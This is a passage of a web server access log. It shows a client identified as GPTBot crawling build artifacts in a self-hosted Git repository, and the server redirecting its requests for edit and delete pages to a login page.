(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:51:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" +[17/Feb/2026:18:51:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:18:51:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:18:51:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PKG-00.toc" +[17/Feb/2026:18:51:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:18:51:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:51:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:51:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11143] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11144] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11142] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 53754] [Gzip 27.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 9804] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 9819] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:18:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 9808] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:18:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:18:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:18:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9830] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 926] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:51:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:51:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:18:51:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:18:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 926] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9832] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:18:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9828] [Gzip 2.89] [Sent-to 192.168.0.250] 